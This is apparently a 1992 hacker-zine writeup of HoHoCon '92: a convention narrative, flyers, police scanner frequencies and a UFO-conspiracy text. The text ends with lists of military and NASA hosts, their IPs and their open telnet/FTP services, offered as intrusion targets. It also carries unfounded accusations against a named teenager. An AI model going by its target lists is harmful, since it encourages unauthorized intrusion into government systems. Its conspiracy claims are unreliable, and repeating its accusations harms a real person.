+the issues concerning the electronic community.
+
+Next, Jim Carter gave a quick and dirty demonstration of how to monitor
+electromagnetic radiation and how to do a simple data recovery from this
+noise.  He monitored a small data terminal from a portable television set
+that was completely unmodified.  He then spoke on how to read the
+EMR from such things as plumbing, the ground, off of window panes, etc.
+Jim's speech, although highly intriguing, got extremely vague at points,
+especially regarding technology needed, his own background, etc.
+(We will attribute this to his "CIA" training.)
+
+The Hotel Officials showed up and demanded that everyone get out immediately.
+Apparently someone had staggered into the kitchen, drunk, and broken
+something.  Steve Ryan left to smooth things out a bit.  After a few minutes
+he returned and told everyone that they could stay, but to keep it quiet
+tonight.  Thus the secret plans of some to drive the hotel golf cart
+into the pool were crushed.
+
+The raffle proved to be an exercise in banality.  Everything from
+flashing street lights to SunOS 4.1.3 to T-shirts to books were
+auctioned off.  One lucky devil even got an official Michael Jackson
+candy bar.
+
+The folks from RDT (Count Zero and White Knight) handed out a large amount
+of photocopied goodies such as the new "Forbes" article on hackers,
+a complete set of the old 70's telephony 'zine "TEL" as well as assorted other
+flyers and pamphlets.
+
+Up next, Louis Cypher spoke about his entanglement with the law
+regarding his front-page bust for counterfeiting.  He told of his
+experiences with the law, how they got involved in such a dastardly
+deed, what jail was like on the inside, and advice against anyone
+else considering such a thing.
+
+Up last, John Draper.  Draper had managed by this time to annoy almost
+everyone at the convention.  A large portion of those in attendance
+left as soon as he got up.  They were the unlucky ones.  Draper, for all his
+oddities, is an intriguing speaker.  His life has been quite rich with
+excitement and when he can actually focus on a subject he is captivating.
+He spoke on his trip to the Soviet Union where he met computer and telephone
+enthusiasts in Moscow.  He spoke on his unfortunate involvement with
+Bill SF and the BART Card duplication scandal.  He spoke, with obvious
+longing, of the good old days of blue boxing, and stacking tandems to
+obtain local trunks, and on verification circuitry.
+
+Listening to Draper talk really brought me back to my beginnings.  I could
+hear in my head the "cachink-chink" of a tandem waiting for MF.  I remembered
+stacking tandems to Europe and back to call my other line.  I remembered
+the thrill of finding never before known trunks and exploring their
+connections.  I fell into a deep nostalgic high, and walked up to John
+to tell him thanks.  As I extended my hand to him, he mumbled something
+unintelligible and wandered off.  So much for paying respect.
+
+About ten of us took off to Chuy's for dinner:  Me, Chasin, Conflict,
+Rambone, Dispater, Blue Adept, Minor Threat and reporters Joe Abernathy
+and Gary Poole were among the diners.  Everyone ate heartily and listened
+to cordless telephone conversations on Rogue Agent's handheld scanner.
+One conversation was between what appeared to be a "pimp" talking to his
+"ho" about some money owed him by another in his flock.  The conversation
+drifted to the Dallas man who had terrorized an entire neighborhood some
+months back with prank phone calls.  Conflict and Dispater repeated a
+few of the choicest of the calls for our amusement.
+
+Back at the hotel, Dr. Hoffman's Problem Child had escaped, and several
+casualties were reported.
+
+Conflict, Chasin and I barricaded ourselves in our room and went on a lengthy
+stream of consciousness rant about what we needed out of life.  Our absolute
+essentials were reduced to a small room with a computer hooked into the
+Internet, a specially designed contour chair, a small hole through which
+a secretary would give us food, virtual reality sex toys, and a toilet.
+(Chasin suggested no toilet, but a catheter so we would never have to move.)
+Gary Poole was quietly stunned in the corner of the room making mental notes.
+
+Much of the con had moved into a suite that had been converted into a
+mass computing arena.  Several attendees from Pittsburgh had turned their
+room into a lab with four Unix workstations with several terminals throughout
+the room including the bathroom!  These were hooked into the Internet through
+a slip connection that had been rigged somewhere.  It was quite a site.
+The room was usually completely packed and smelled like a smoky gymnasium.
+
+(It was rumored that after Chasin and I spoke on the UFO conspiracy, several
+hackers began their attempts at penetrating the Ames Research Lab.  No
+reports back on their success.)
+
+After I finished copying several Traci Lords video tapes (ahem) I relinquished
+control of the decks to a room downstairs.  Dispater played a video
+manipulation he and Scott Simpson had produced.  They had found a TRW training
+video tape during a trashing run and dubbed in their own dialogue.  (You'd
+have to see it to fully understand.)
+
+After that, I played a few tapes of my own.  The first was a short film called
+"Red," that chronicled the abusive prank phone calls directed at a bartender.
+The film had the actual phone call tapes played with video stills.  (Guess
+where the Simpsons came up with that nifty idea...)
+
+Following "Red," someone heard on the scanner that the guard was answering
+a large noise disturbance in the room we were in.  (Yes, they had the hotel
+guard's 2-meter frequencies.)  Everyone moved into another room before the
+guard showed up.  He was thoroughly confused.
+
+In the next room I played the ultimate in shock, the sequel to the movie that
+I had disturbed the entire con with last year, "Nekromantik II."  I won't
+go into any detail, since the title says it all.  Once again, I reign as
+the sickest person at HoHoCon, this honor bestowed upon me by everyone
+who witnessed the showing.
+
+As things winded down, several people ended up back in our room to waste
+away the last few hours of the night.  Several people returned from an
+adventure to "an abandoned hospital."  No one really understood what they went
+to, but it sounded disturbing.  Later, that same group would leave to
+go climb "an abandoned grain storage tower."  Go figure.
+
+Approximately 2:00 am, a local hacker named Zach showed up.  Scott had a few
+words for Zach, as did most everyone at the Con.  Zach lived in a fantasy
+land where he was a top notch security consultant with high paying clients
+in the telecommunications industry.  He also like to name drop names like
+Chasin and Goggans as his partners and as people who would swoop down
+and terrorize the people he had any problems with.  He also liked to turn
+in, or threaten to turn in any of his rivals in the software pirating
+community.  He also like to proposition young boys both in person and
+over the phone.  At 17, Zach had a few problems.
+
+Trapped in the corner of the room, Zach endured about an hour of questioning
+and accusations (all of which he truly deserved.)  Eventually Zach left,
+apparently not affected by the ordeal at all.  We attributed this to his
+overly apparent schizophrenia brought on by denial of his sexual
+tendencies.
+
+Later that night the Pittsburgh gang blew out the power in their entire
+wing.  One was overheard, "Hmmm...guess we should have known that when the
+power strips kept melting that we were drawing too much power."
+
+The next morning everyone gathered up their gear and said so long.  All but
+a few who gathered in a room marked "the suite of the elite."  Armed with
+a nitrous oxide blaster, everyone sat around and viewed the con through
+the roaming video eye of Jesse, who had managed to capture everyone
+in some kind of compromising position.  He will be selling them off
+after he edits it a bit.  It was dubbed "The Blackmail Tape."
+
+In my opinion this year was much less anarchistic than last year.  The
+convention might not even be banished from this hotel.  (Yeah, right.)
+There were no raids, there were no overtly violent or satanic acts,
+no fire alarms, no trashing runs (that I saw), no fights,
+and there were no strippers (alas).  The conference portion of the
+event was much better organized, there was much more interesting
+information to be shared, and was well worth the distances traveled by
+all.
+
+This was HoHoCon '92.
+
+--------------------------
+
+                 H*O*H*O*C*O*N '92
+
+                 Frosty's Itinerary
+
+Thursday 8pm  Take off and go bar hopping all night long to build up
+              stamina for the convention.
+
+Thrusday 10pm Quit bar hopping and waste shitloads of money at the
+              casinos in feeble attempts to get gas money for the trip.
+
+Friday   5am  Leave the casino and decide to get some sleep after spending
+              hours to win a meager $10 over starting cash.
+
+Friday   8am  Wake up and decide to pack for the trip.  Forget necessities
+              that we couldn't live without.  Remember to bring junk food.
+
+Friday   9am  Stuff assembled GCMS members into subcompact Japanese micro
+              car and leech as much gas money out of them as possible.
+
+Friday   2pm  Stop at the friendly convenient store to rob it of precious
+              sugar-coated necessities and obtain mucho lotto tickets.
+
+Friday   4pm  Endure Windrunner's gruelling multi-hour long verbatim
+              rantings of taking the Purity Test 1500 verbally.
+
+Friday   7pm  Pull out many maps and try to find the damn hotel in Houston.
+
+Friday   9pm  Arrive at the hotel getting a room for one (car stuffed
+              with people sits outside the lobby).  Request two keys.
+
+Friday  10pm  Test the smoke machine on the hotel grounds.  Chase young
+              code-kids out of your way, threatening to disable their
+              phones.
+
+Friday  11pm  Crash in room from lack of sleep.  Kick other members out
+              of your way.  Ignore multiple alcoholic beverages lining
+              the room.  Ponder what's sleeping in the chair briefly.
+
+Saturday ???  Try to figure out if you're awake or dead.  Take a collection
+              from those that are still alive.  Run to some micro-compact
+              Japanese convenience store hidden in the middle of suburbia
+              hell and obtain sugar-coated nutrients with Windrunner and
+              JunkMaster and Gaijin.
+
+Saturday 1pm  Arrive for the conference.  Get mega-amounts of raffle tickets.
+
+Saturday 2pm  Conference actually gets started a few hours behind schedule.
+              Tape conversations from the man with the whisper 2000 home
+              version.  Ponder the light orbiting Erik B's head.
+
+Saturday 4pm  Witness Steve Ryan in action against the hotel staff.
+              Wonder where the young hack in the corner got the gallon,
+              mostly empty now, of wine.  Ponder if he's going to spew.
+
+Saturday 6pm  Try to figure out what everyone is going to do with the
+              several hundred flashing construction lights given out.
+              Calculated the ratio of men to women as 15,000:1, roughly.
+
+Saturday 8pm  Try to keep awake while wondering how much torture can be
+              sustained.  Watch Count Zero nodding off.  Hitman and I
+              pulled out our decoder rings to interpret Crunch's hidden
+              message.
+
+Saturday 10pm Dominoes Pizza makes it to the room.  OUR SAVIOR !!!  He's
+              5-minutes late.  Custody battle over the pizza ensues.  The
+              manager is called, at which point he lowers the $50 price
+              for the two pizzas down to $30.  We scrape a few dollars and
+              hand the peon delivery boy some cheap beer.
+
+Saturday Nite Hand out copies of "cindy's torment" to the code kids.
+              Watch Erik B.'s continuation of necrophiliac desires on
+              the acquired VCR that mysteriously appeared.  Avoided the
+              hotel security by changing room while monitoring their
+              frequencies (thanks RDT).  Obtained evidence that hackers
+              were breaking into VR R&D departments to engage in endless
+              routines of VR sex for Cyborgasmic responses.  Saw Crunch's
+              host's room blow out as the multitudes of computers fry the
+              circuits.  Followed the 'sheep' about the hotel.
+
+Sunday ???    Woke bright and early to a car locked with the keys inside.
+              Fortunately, 50-odd slim-jims appeared out of nowhere to
+              save the day.  Windrunner chauffeured us back to our lair.
+
+Sunday 3pm    Hacked into the Louisiana Lotto machine from an acoustical
+              modem and laptop from a pay phone to rig the numbers and
+              then bought a ticket.
+
+Sunday 7pm     Returned to hell.  Lost the lotto ticket in the growing
+               pile of sugar-coated necessities sheddings.  Cursed.
+
+Sunday 8pm     Turned the PC on and hit the networks.
+
+
+--------------------------
+
+Jim Carter, president of Bank Security in Houston, TX, wrote the
+following impressions of HoHoCon for Security Insider Report
+(December, 1992)
+
+HoHoCon was in fact "Unphamiliar Territory" for this "good ole boy,"
+but it didn't take long till I was into the swing of things and
+telling lies of how we cheat and steal to get our information.  Of
+course, everyone who talked to this "good ole boy" thought he was with
+one of the three letter agencies.  As the stories rolled on about what
+they (the hackers) could do, such as produce virii that would cause
+video display terminals and hard drives to smoke, I had to sit back, sip
+my brewski and say "wow."  We sat back, enjoyed a few more rounds, told
+a few more lies and had a good time.
+
+Well, this old boy didn't show until about noon on Saturday.  Of course
+the conference hadn't started yet so we didn't miss anything.  The
+program was kicked off with a number of questions about who, what, where
+and how.  It was difficult to determine how many people were there since
+the room was packed like a can of sardines.  Our estimate was over two
+hundred, not counting the hackers still in their rooms.  Was this
+another drunken free for all, as in the past?  A report was given on
+cellular hacking and toll fraud.  Hackers' rights were presented by an
+attorney.  Also discussed was the stupidity of the press and law
+enforcement.
+
+Some others talked about suppressed information from the federal
+government concerning UFO's and how hackers are gaining this info.  And
+of course the White House wants to know their sources.
+
+Hand outs were given including virii and virus source code.  I did
+decline any virii, but who knew what I would get before this was over.
+I believe this was the most responsive and gratifying group I have
+spoken to this year.  I also expect to get more business because of this
+presentation than any other this year.
+
+A lengthy door prize was held in which I was the winner of more virii.
+Again, I did decline, but passed the winning ticket on.  Captain Crunch
+was the final speaker.  In conclusion, the attendees were the good, the
+bad and the ugly.  We did find HoHoCon very informative and, yes, we
+will attend again.  In closing, I hope each and everyone had a very
+"Merry HoHoCon."
+
+
+--------------------------
+
+A (Hacker's) Mind is a Terrible Mind to Waste
+Unix World, page 136, March 1993
+
+by Gary Andrew Poole
+
+[Unix World wanted MONEY to reprint this in full...Yeah, right.
+ Someone already posted it on alt.cyberpunk some time ago
+ if you can't find it anywhere.]
+
+*-----------------------------------*
+
+ Various Stuff Picked up at HoHoCon
+
+*-----------------------------------*
+
+--------------------------
+Flyer:
+--------------------------
+
+Unphamiliar Territory
+Phalcon/Skism Western World Headquarters
+The Ghost in The Machine Distribution
+
+Featuring:
+
+- 'Neutral Territory' forum where security issues can be discussed with
+top security people in the field.
+
+- Completely LEGAL forums on computer security, hacking, phraud.
+
+- Thousands of textfiles covering all aspects of the underground.
+
+- Hundreds of viruses and virus source code for the serious
+programmer.
+
+Information:
+
+- Administrators are Invalid Media, Mercury/NSA, Warlock Bones and
+Jaeger.
+
+- Run on a professor Falken/LOD donated ZOOM v32bis
+
+- Mentioned in MONDO 2000 and reviewed in the latest Infoworld.
+
+- Dialin 602-894-1757 / 24 hours
+
+--------------------------
+Flyer
+--------------------------
+
+In your defense..... Courtesy Freeside Orbital Data Network, HoHoCon '92
+                                       - B. O'Blivion
+Repeat after me:
+
+    "If I am reading this to you, then I believe that you are
+questioning, detaining, or arresting me, or searching my person or
+possessions in the course of your official duties."
+
+    "I do not consent to any search of seizure of any part of my person
+or property, nor to any property of others under my control.  I do not
+consent to any person's examination, search, or removal of any
+information storage equipment or media in my possession.  You are hereby
+notified that such information storage equipment or media contain
+private written and electronic mail, confidential communications, and
+other material protected under the Electronic Communications Privacy Act
+and other statutes."
+
+    "I respectfully decline to answer any questions beyond confirmation
+of my identity, and require access to legal counsel immediately.  I
+demand that access to legal counsel be provided to me before any
+questioning takes place.  I will answer no questions nor give any
+information outside the presence of legal counsel.  All requests for
+interviews, statements, consents, or information of any sort should be
+addressed to me through my attorney.  I invoke the rights five to me by
+the Fifth and Sixth Amendments of the Constitution of the United
+States."
+
+    "I further notify you that the speech and information contained on
+information storage and handling devices at this site are protected
+by the First and Fourth Amendments to the Constitution of the United
+States, and that any unlawful search or seizure of these items or of
+the information they contain will be treated as a violation of the
+Constitutional rights of myself and other users of these devices and
+media."
+
+    "I further notify you that any such violations of any person's legal
+or Constitutional rights which are committed at any time, by any person,
+will be the subject of civil legal action for all applicable damages
+sustained.  I require that at this time all officers participating in
+this illegal search, seizure, or arrest identify themselves at this time
+by name and badge number to me and my legal counsel."
+
+[Include if applicable]
+
+    "I further notify you that I am a Computer System Operator providing
+private electronic mail, electronic publications, and personal
+information storage services to users in this State, and among the
+United States.  Any person causing a breach of the security of, or
+violation of the privacy of, the information and software herein will be
+held liable for all civil damages suffered by any and all users
+thereof."
+
+--------------------------
+Flyer
+--------------------------
+
+HoHoCon 1992
+Amusing Local Frequencies
+courtesy of -=RDT.
+
+Allen Park Inn Security - 464.500           Houston Post - 154.540
+                                                           173.275
+
+                                                           452.975
+Houston Police:
+
+North Shepherd Patrol - 460.325
+NE Patrol - 460.125
+SE Patrol - 460.025
+SW Patrol - 460.050
+Central Patrol - 460.100
+Spec. Op. Traffic - 460.350
+Car 2 Car - 460.225
+South Central Patrol - 460.550
+NW Patrol - 460.475
+West Patrol - 460.150
+Accident - 460.375
+Misc - 460.525
+       460.575
+       460.400
+Records - 460.425
+City Marshalls - 453.900
+Paging - 155.670
+Police Intercity - 453-550
+
+  A number of people have been asking "who is RDT?  what the hell is
+RDT?"  For the record, we're hackers who believe information should be
+free.  All information.  The world is full of phunky electronic gadgets
+and networks, and we want to share our information with the hacker
+community.  We currently write for 2600 magazine, Phrack, Mondo 2000,
+Cybertek, and Informatik.
+  The five "charter members" of RDT are Count Zero, Brian Oblivion,
+Magic Man, White Knight, and Omega.  Each of us has complementary
+skills, and as a group we have a very wide area of technical
+knowledge.  Feel free to contact us.
+
+Count Zero - count0@ganglia.mgh.harvard.edu
+                         Brian Oblivion - oblivion@ganglia.mgh.harvard.edu
+Magic Man - magic@ganglia.mgh.harvard.edu
+                         White Knight - wknight@ganglia.mgh.harvard.edu
+                         Omega - omega@spica.bu.edu
+
+"They are satisfying their appetite to know something that is not theirs
+to know."   - Asst. District Attorney Don Ingraham
+
+"All-you-can eat buffet...for FREE!"  - Restricted Data Transmissions
+
+RDT  "Truth is Cheap, but Information Costs."
+
+--------------------------
+Magazine
+--------------------------
+
+Future Sex
+
+(a very odd pseudo-cyberpunk skin mag)
+
+4 issues for $18, Canada $26, International US $48
+
+1095 Market Street
+Suite 809
+San Francisco, CA 94103
+415-621-5496
+415-621-4946 fax
+
+--------------------------
+Video
+--------------------------
+
+Red  $19.95
+(Phone Pranks can kill)
+
+Nekromantik II $29.95
+(No comment)
+
+Available through
+
+Film Threat Video
+P.O. Box 3170
+Los Angeles, CA
+90078-3170 USA
+
+818-848-8971
+
+Shipping:  1 tape  $3.40
+           2-3     $4.60
+           4-6     $5.80
+           6+      $7.00
+
+Visa/MC accepted.
+
+--------------------------
+Official HoHoCon Crud
+--------------------------
+
+
+                                HoHoCon '92
+
+                        Product Ordering Information
+
+
+    If you are interested in obtaining either HoHoCon shirts or videos,
+                 please contact us at any of the following:
+
+                            drunkfux@cypher.com
+                             hohocon@cypher.com
+                               cDc@cypher.com
+                            dfx@nuchat.sccsi.com
+                      drunkfux@ganglia.mgh.harvard.edu
+                            359@7354 (WWIV Net)
+
+                       Freeside Orbital Data Network
+                             ATTN: dFx/HoHoCon
+                       11504 Hughes Road  Suite #124
+                               Houston, Texas
+                                   77089
+
+                         713-866-4884 (Voice Mail)
+
+
+     The shirts are $15 plus $2 shipping ($2.50 for two shirts). At this
+     time, they only come in extra large. We may add additional sizes if
+     there is a demand for them. The front of the shirt has the following
+     in a white strip across the chest:
+
+
+                                I LOVE FEDS
+
+       (Where LOVE = a red heart, very similar to the I LOVE NY logo)
+
+
+                           And this on the back:
+
+                             dFx & cDc Present
+
+                                HOHOCON '92
+
+                               December 18-20
+                               Allen Park Inn
+                               Houston, Texas
+
+
+     There is another version of the shirt available with the following:
+
+                                I LOVE WAREZ
+
+     The video includes footage from all three days, is six hours long and
+     costs $18 plus $2 shipping ($2.50 if purchasing another item also).
+     Please note that if you are purchasing multiple items, you only need
+     to pay one shipping charge of $2.50, not a charge for each item. If
+     you wish to send an order in now, make all checks or money orders
+     payable to O.I.S., include your phone number and mail it to the street
+     address listed above. Allow ten working days for arrival.
+
+     Thanks to everyone who attended and supported HoHoCon '92. Mail us if
+     you wish to be an early addition to the HoHoCon '93 (December 17-19)
+     mailing list.
+
+--------------------------
+Text File
+--------------------------
+
+Rumors have begun to surface about a group of hackers who were involved in a
+project to uncover information regarding the existence of UFOs.  The
+most public example pertaining to this alleged project was seen on
+Dateline NBC on the screen of the mystery hacker "Quentin."
+
+The story goes that this group of individuals decided to put their
+skills to work on a project that, if successful, would add legitimacy to
+the hacking process by uncovering information on what has been called the
+greatest cover-up in the history of the world.  Milnet TAC ID cards
+were obtained through military officials sympathetic to the cause. Several
+sites and networks were targeted that had in the past been linked to UFO
+activity.  These were sites like the Jet Propulsion Laboratory, Sandia Labs,
+TRW Space Research, American Institute of Physics, and various other
+educational, government and military sites.
+
+The rumors also emphasize that several sites had what these individuals
+called "particularly heavy security."  Within several seconds after
+connection had been established, system administrators of sites used in
+this project were contacted.  Further rumors state that there was
+information regarding a propulsion system designed utilizing what is
+termed "corona discharge" being analyzed at one site.  The most sinister
+of all rumors states that one particular participant who was allegedly
+deeply immersed in TRWs internal network has not been heard from since
+uncovering data regarding a saucer being housed at one of their Southern
+California installations.
+
+Believe what you will about the reality of this project.  Much will be
+dismissed as hacker lore, but within the core of every rumor lies a
+grain of truth.
+
+Are we being lied to?  Why is this information still classified by the NSA?
+What are they hiding from us behind a maze of security?  Will we continue
+to stand idly by and let an uncaring and deliberately evasive government
+shield us from what may be the most important, and potential dangerous
+news to ever surface?  Information wants to be free, and only a
+concerted group effort can make this happen.  How much do you really
+want to know about what is really going on?
+
+What follows is information that has been released regarding this project...
+
+---------------------------------------------------------------------------
+
+PROJECT ALF-1
+
+A Planetary Effort
+
+TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
+TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET TOP SECRET
+
+These are the raw data.  Where comments are appropriate, they
+will be included.  The data will be grouped together with dates,
+names etc. to make correlations easier.
+
+There are countless references to the aliens, their down space
+craft and what the Government is doing with them.
+If, as is supposed, the research on the craft and the 'ufonauts'
+continues today, then undoubtedly there are computer records, somewhere.
+
+I. Searching the Skies; Tripping the Electronic Fence around the
+USA.
+
+US Space Command Space Surveillance Center, Cheyenne Mountain,
+Colorado Springs, Box Nine (Electronic Surveillance Room)
+(This is where they search for and track UFO activity.)
+U.S. Naval Space Surveillance System, Dahlgreen, Virginia, (Main
+computer), Lake Kickapoo, Texas (listening post): Search for
+'Flash Traffic'
+Commander Sheila Mondran
+CINC-NORAD
+Space Detection and Tracking System
+Malabar, Forida
+'Teal Amber' search
+National Military Command Center - Pentagon
+(These are the areas where UFO activity is tracked.
+There is a radar shield around the country that is 'tripped' by UFO's.
+All tracking and F14 scrambling is done through this system.)
+
+II. The Second Cover Up
+
+Defense Intelligence Agency
+Directorate for Management and Operations
+Project Aquarius (in conjunction with SRI)
+
+Colonel Harold E. Phillips, Army (where/what Feb. 1987)
+UFO Working Group, (formed Dec 1987)
+Major General James Pfautz, USAF, Ret. (March 87)
+US Army experiments -(Monroe Institute, Faber, VA)
+Major General Albert Stubblebine
+Capt. Guy Kirkwood,
+(thousands of feet of film of UFO's catalogued and on record somewhere.)
+The UFO Working Group was formed because one arm of the Govt doesn't
+know what the other is doing.)
+
+III. National Security
+
+NSA NAtional Security Agency, Dundee Society (Super secret elite
+who have worked on UFO's.)
+NSA - Research and Engineering Division
+NSA - Intercept Equipment Division
+
+Kirtland Force Base, Office of Special Investigations, Project
+Beta. 1979-83-?  (Sandia Labs are here.)
+Paul Bennewitz
+Project Blue
+Project Blue Book
+
+(NSA computers do analysis for Pentagon.)
+
+IV. More Secret Players
+
+NASA, Fort Irwin, Barstow, CA
+NASA Ames Research Center, Moffet Field Naval Base
+SETI
+State Dept. Office of Advanced Technology
+Any Astronauts from Mercury, Gemini and Apollo
+CIA - Office of Scientific Investigation
+CIA - Domestic Collection Division
+
+(NASA has known about UFO's since the astronauts saw and photoed them.
+Records somewhere.)
+
+V.  Dealing with the Secret
+
+MJ-12 (1952)
+Majectic 12
+Operation Majestic 12
+MAJIC-12
+Admiral Roscoe H. Hillenkoetter
+Dr. Vannevar Bush
+Dr. Detlev Bronk
+Dr. Jerome Hunsaker
+Dr. Donald Menzel
+Dr. Lloyd Berkner
+General Robt. Montague
+Sidney Souers
+Gordon Gray
+General Hoyt Vandenberg
+Sect State James Forrestal
+General Nathan Twining
+Pres. Truman
+Pres. Eisenhower
+
+(One of the biggest secrets ever.)
+
+Nevada Desert, Area 51, S4 (houses UFO's)
+(Robert Lazar talked!) 9 space ships on storage. Propulsion by
+corona discharge.
+
+(Area 51 is the most protected base on the planet.)
+
+VI. ROSWELL, NM Crashes
+Mac Brazel (farmer)
+Major Jesse A. Marcel
+509th. Bomber Group
+Lewis Rickett, CIC Officer
+Colonel William Blanchard
+Gerald Anderson, witness to crash and aliens
+
+Wright Patterson Air Force Base, (parts lists of UFO's catalogued;
+autopsies on record) (Bodies in underground facility)
+Foreign Technology Building
+USAAF (United States Army Air Force reports: "Early Automation"
+Muroc, CA (Base with UFO's for study)
+
+(1 saucer with 4 aliens.  They were transported to Wright and then
+saved, catalogued and autopsied.)
+
+
+VII. THOSE ON GOVT SHIT LIST
+
+(People who have gotten close.)
+
+Robert Lazar
+Major Donald Keyhoe
+William Moore
+Stanton Friedman
+Jaime Shandera
+Whitley Streiber
+Timothy Goode, UK
+
+Other UFO Crashes
+Del Rio, TX 12/50, Colonel Robert Willingham
+Las Vegas, 4/18/62
+Kecksburg, PA 12/9/65
+
+
+VIII. International
+
+Belgian Air Force.  (They are going public and have records.
+Press conference held 7/12/91.)
+Australian Air Force
+UK; GCHQ
+British Air Force
+Belgium:
+NATO Radar Stations
+
+
+IX. UFO Civilian Groups. (What do they really know?)
+
+NICAP, National Investigations Committee on Aerial Phenomena
+(private company.)
+
+APRO, Tucson, AZ (Aerial Phenomona Research Organization,
+private company.)
+
+MUFON Mutual UFO Network
+
+X. GENERAL
+
+Kenneth Arnold, June 24, 1947
+Cattle and Sheep Mutilations
+General and Pres. Eisenhower, (private files and library)
+President Truman
+Wright Field or Wright Patterson Air Force Base, Dayton, OH, (Air
+Force Foriegn Technology Division)
+USAF Project Saint
+USAF Project Gemini
+Project Moon Dust
+Project Sign
+Project Grudge
+General Hoyt Vandenberg (1940-1960)
+Air Force Regulation 200-2 (8/12/54)
+Holloman AFB, NM
+Roswell, NM July 7, 1947
+
+
+XI. Possible Searches
+
+Presidential Libraries
+Old USAAF, (United States Army Air Force)
+NASA
+Astronaut Frank Borman, Gemini 7, pictures of UFO
+Neil Armstrong, Apollo 11, saw UFO's on moon.
+Colonel Gordon Cooper saw a bunch of them
+James McDivitt, 6/66
+United Nations
+NATO;
+General Lionel Max Chassin, French Air Force
+Star Wars, United Kingdom, 23 scientists killed in 6 years.
+Gulf Breeze, FL
+Additional UFO records at NSA, CIA, DIA,  FBI
+
+
+Good Searching.
+
+----------------------------------------------------------------------
+                    Project
+                ->Green Cheese<-
+                   Data Base
+---------------------------------------------------------------------
+Holloman AFB
+   Location: New Mexico.  Preconceived landing 15 years ago.
+
+DDN Locations:
+--------------
+
+NET : 132.5.0.0 : HOLLOMAN :
+
+GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
+GATEWAY : 26.9.0.74, 132.5.0.1 : HOLLOMAN-GW.AF.MIL : CISCO-MGS :: EGP,IP/GW :
+
+HOST : 26.10.0.74 : HOLLOMAN-TG.AF.MIL : VAX-8650 : VMS : TCP/FTP,TCP/TELNET,TCP
+       SMTP :
+
+HOST : 26.6.0.74 : HOLLOMAN-AM1.AF.MIL : WANG-VS100 : VSOS : TCP/TELNET,TCP/FTP,
+       TCP/SMTP :
+
+Host: DDNVAX2.6585TG.AF.MIL
+      156.6.1.2
+
+-----------------------------------------------------------------------
+
+Kirtland Air Force Base
+    Office Of Special Investigations.  Sandia Labs are here. Also part of
+    NSA Intercept Equipment Division.
+
+Key Words/names:
+----------------
+Sandia Labs
+Project Beta (1979-83-?)
+Paul Bennewitz
+Project Blue
+Project Blue Book
+
+DDN Locations:
+--------------
+
+NET : 131.23.0.0 : KIRTLAND-NET :
+NET : 132.62.0.0 : KIRTLAND2 :
+GATEWAY : 26.17.0.48, 131.23.0.1 : KIRTLAND2-GW.AF.MIL,KIRTLAND-GW.AF.MIL
+        : CISCO-MGS : UNIX : IP/GW,EGP :
+GATEWAY : 26.18.0.87, 132.62.0.1
+        : KIRTLAND1-GW.AF.MIL,KIRTLAND1606ABW-GW.AF.MIL : CISCO-MGS :
+        : EGP,IP/GW :
+HOST : 26.0.0.48 : KIRTLAND.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.0.0.87 : KIRTLAND2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.6.0.87 : KIRTLAND-AM1.AF.MIL : WANG-VS300 : VS ::
+
+-----------------------------------------------------------------------
+
+NASA
+   What can I say about NASA that you couldnt guess for yourself....
+   (Except that the following sights are SPECIFIC NASA sights, not
+   just randomly suspected sights).
+
+DDN locations:
+--------------
+
+Fort Irwin, Barstow, CA:
+-----------------------
+NET : 134.66.0.0 : IRWIN :
+NET : 144.146.0.0 : FTIRWIN1 :
+NET : 144.147.0.0 : FTIRWIN2 :
+GATEWAY : 26.24.0.85, 26.7.0.230, 144.146.0.1, 144.147.0.0
+        : FTIRWIN-GW1.ARMY.MIL : CISCO-GATEWAY : CISCO : IP/GW,EGP :
+HOST : 26.14.0.39 : IRWIN-ASBN.ARMY.MIL : NCR-COMTEN-3650 : COS2 ::
+HOST : 26.13.0.85 : FTIRWIN-AMEDD.ARMY.MIL : ATT-3B2-600G : UNIX
+     : TCP/FTP,TCP/SMTP,TCP/TELNET :
+HOST : 26.14.0.85 : FTIRWIN-IGNET.ARMY.MIL : DATAPOINT-8605 : RMS ::
+HOST : 26.15.0.85 : IRWIN-EMH1.ARMY.MIL,FTIRWIN-EMH1.ARMY.MIL : SPERRY-5000
+     : UNIX : TCP/FTP,TCP/SMTP,TCP/TELNET :
+
+Moffet Field Naval Base (Ames Research Center):
+-----------------------------------------------
+GATEWAY : 26.20.0.16, 192.52.195.1 : MOFFETT-FLD-MB.DDN.MIL,AMES-MB.DDN.MIL
+        : C/70 : CHRYSALIS : IP/GW,EGP :
+HOST : 26.0.0.16 : MOFFETT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+
+-----------------------------------------------------------------------
+Pentagon (National Military Command Center)
+    One of many places in charge of tracking UFO activity.
+
+Possible DDN sights:
+-------------------
+
+GATEWAY : 26.9.0.26, 134.205.123.140 : PENTAGON-GW.HQ.AF.MIL : CISCO-AGS :
+        : EGP,IP/GW :
+GATEWAY : 26.25.0.26, 131.8.0.1 : PENTAGON-GW.AF.MIL,HQUSAFNET-GW.AF.MIL
+        : CISCO-MGS :: IP/GW,EGP :
+GATEWAY : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN-GW.ARMY.MIL : SUN-360
+        : UNIX : IP/GW,EGP :
+GATEWAY : 26.26.0.247, 192.31.75.1 : PENTAGON-GW.ARMY.MIL : SUN-3/160
+        : UNIX : EGP,IP/GW :
+GATEWAY : 26.31.0.247, 26.16.0.26, 141.116.0.1 : PENTAGON-GW1.ARMY.MIL
+        : CISCO : CISCO : IP/GW,EGP :
+HOST : 26.0.0.26 : PENTAGON.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.24.0.26 : OPSNET-PENTAGON.AF.MIL : VAX-8500 : VMS
+     : TCP/TELNET,TCP/FTP,TCP/SMTP :
+HOST : 26.10.0.76, 192.31.75.235 : PENTAGON-BCN.ARMY.MIL : SUN-360 : UNIX
+     : TCP/FTP,TCP/SMTP,TCP/TELNET :
+HOST : 26.0.0.247 : PENTAGON2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.7.0.247 : PENTAGON-AMSNET.ARMY.MIL : AMDAHL : MVS
+     : TCP/TELNET,TCP/FTP :
+HOST : 26.14.0.247 : NSSC-PENTAGON.NAVY.MIL : ALTOS-3068A : UNIX
